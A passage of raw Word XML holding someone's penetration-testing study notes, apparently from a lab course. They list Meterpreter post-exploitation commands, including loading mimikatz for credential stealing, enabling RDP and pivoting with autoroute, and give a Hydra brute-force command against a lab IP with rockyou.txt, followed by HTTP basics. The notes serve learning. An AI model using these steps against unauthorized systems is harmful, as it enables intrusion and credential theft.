          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Migrate command to transfer into a process from the spool (using PID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCB221" w14:textId="7BB47FF1" w:rsidR="005A7C76" w:rsidRPr="0084205E" w:rsidRDefault="005A7C76" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Need sufficient privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D3703" w14:textId="7D6C4ABF" w:rsidR="005A7C76" w:rsidRPr="0084205E" w:rsidRDefault="005A7C76" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> HELP for assistance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C86FC" w14:textId="0E93255E" w:rsidR="005A7C76" w:rsidRPr="0084205E" w:rsidRDefault="005A7C76" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – find out more information regarding the current user process is running in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D3887" w14:textId="56F8E8F2" w:rsidR="005A7C76" w:rsidRPr="0084205E" w:rsidRDefault="005A7C76" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – find out more about the information itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D7737" w14:textId="0061A3CF" w:rsidR="00C523B7" w:rsidRPr="0084205E" w:rsidRDefault="00C523B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Load kiwi – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for credential stealing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD5F60B" w14:textId="4360D90A" w:rsidR="00C523B7" w:rsidRPr="0084205E" w:rsidRDefault="00C523B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Getprivs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – figure privileges of current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757335D0" w14:textId="0E1A9F72" w:rsidR="00C523B7" w:rsidRPr="0084205E" w:rsidRDefault="00C523B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Upload – transfer files to victim computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E639A6D" w14:textId="3A0B5807" w:rsidR="00C523B7" w:rsidRPr="0084205E" w:rsidRDefault="00C523B7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run – run a Metasploit module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CDCF5" w14:textId="68DF491E" w:rsidR="00C523B7" w:rsidRPr="0084205E" w:rsidRDefault="00355ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Ifconfig/ipconfig – display networking information and interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904E17C" w14:textId="6236ADFA" w:rsidR="00355ECE" w:rsidRPr="0084205E" w:rsidRDefault="00355ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>checkvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66BD369F" w14:textId="0CD3DFD7" w:rsidR="00355ECE" w:rsidRPr="0084205E" w:rsidRDefault="00355ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Determine if inside VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373EF52D" w14:textId="688AE00C" w:rsidR="00355ECE" w:rsidRPr="0084205E" w:rsidRDefault="00355ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32C22897" w14:textId="4DEA36FD" w:rsidR="00355ECE" w:rsidRPr="0084205E" w:rsidRDefault="00355ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check for various exploits that can be ran within session to elevate privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4C7169" w14:textId="4A8AE5E5" w:rsidR="00355ECE" w:rsidRPr="0084205E" w:rsidRDefault="00355ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run post/windows/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>enable_rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DA26C4A" w14:textId="4D4DF4BD" w:rsidR="00355ECE" w:rsidRPr="0084205E" w:rsidRDefault="00355ECE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Shell – command – run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> session to spawn a normal system shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B2E029" w14:textId="559E269A" w:rsidR="00355ECE" w:rsidRPr="0084205E" w:rsidRDefault="005C3F83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Making Cisco proud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3BBFD5" w14:textId="56520E1D" w:rsidR="005C3F83" w:rsidRPr="0084205E" w:rsidRDefault="005C3F83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run autoroute -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F44D8C" w14:textId="2FF66B75" w:rsidR="005C3F83" w:rsidRPr="0084205E" w:rsidRDefault="005C3F83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pivoting through victim with NICs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B85417F" w14:textId="05369D4C" w:rsidR="005C3F83" w:rsidRPr="0084205E" w:rsidRDefault="005C3F83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Add a route to subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB6ECB" w14:textId="1C0E3C0E" w:rsidR="005C3F83" w:rsidRPr="0084205E" w:rsidRDefault="005C3F83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run autoroute -s &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; -n &lt;subnet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6922B029" w14:textId="01871EB5" w:rsidR="005C3F83" w:rsidRPr="0084205E" w:rsidRDefault="005C3F83" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B1BBEE" w14:textId="38835974" w:rsidR="005C3F83" w:rsidRPr="0084205E" w:rsidRDefault="005C3F83" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233E93E1" w14:textId="31BD1FEF" w:rsidR="005C3F83" w:rsidRPr="0084205E" w:rsidRDefault="009A52F1" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7ED95C" w14:textId="3319EF1C" w:rsidR="009A52F1" w:rsidRPr="0084205E" w:rsidRDefault="006B0FF5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">To start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nessus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: run command - /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nessusd.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="04F6D86C" w14:textId="088A9896" w:rsidR="006B0FF5" w:rsidRPr="0084205E" w:rsidRDefault="006B0FF5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Then go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://kali:8834/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to configure the scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480C6EBC" w14:textId="788DFF58" w:rsidR="006B0FF5" w:rsidRPr="0084205E" w:rsidRDefault="006B0FF5" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DBC0AB" w14:textId="29EF245B" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56528EA6" w14:textId="595D42FE" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Brute-force online password cracking program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DFDF3D" w14:textId="2DF2EF16" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hydra in terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCAEECA" w14:textId="65DB15AB" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Options passed in hydra depend on protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB23E1" w14:textId="03E86C57" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SSH, FTP, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690F065" w14:textId="3D8FB7C7" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Username and password list txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8A17D9" w14:textId="169923F7" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. Hydra -l user -P passlist.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ftp://10.10.115.6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4323B5D4" w14:textId="0E0B3A65" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Brute-force webforms as well</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCBFC52" w14:textId="5F00A552" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Browser network tab (in developer tools)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D331ED" w14:textId="7569A815" w:rsidR="00983FD3" w:rsidRPr="0084205E" w:rsidRDefault="00983FD3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GET or POST methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716212DB" w14:textId="606E0C43" w:rsidR="0053511C" w:rsidRPr="0084205E" w:rsidRDefault="0053511C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Rockyou.txt from /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlist/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78D94DD0" w14:textId="051137C8" w:rsidR="0053511C" w:rsidRPr="0084205E" w:rsidRDefault="0053511C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xvf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> extract file for password list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0095A809" w14:textId="74A10EBC" w:rsidR="0053511C" w:rsidRPr="0084205E" w:rsidRDefault="0053511C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Paired with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to intercept message, extract syntax of password and username structure as well as fail statement for incorrect input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF2AF8" w14:textId="7AFB1926" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9084CD" w14:textId="15DF0006" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2710ADD0" w14:textId="682704BF" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>9 different HTTP verbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEE1011" w14:textId="04CBE819" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GET – retrieve content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D93BAA3" w14:textId="23EC25FE" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>POST – send data to web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A48D5" w14:textId="7C6EC320" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HTTP request has several parts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040920B" w14:textId="2DFA00E5" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>First line is a verb and a path for the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0120C3" w14:textId="0DDF311B" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GET /index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B82C5" w14:textId="669E457E" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Next section is headers – give web server additional info about request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCD18E" w14:textId="5B1946B0" w:rsidR="007207C5" w:rsidRPr="0084205E" w:rsidRDefault="007207C5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Contain cookies</w:t>
      </w:r>
    </w:p>
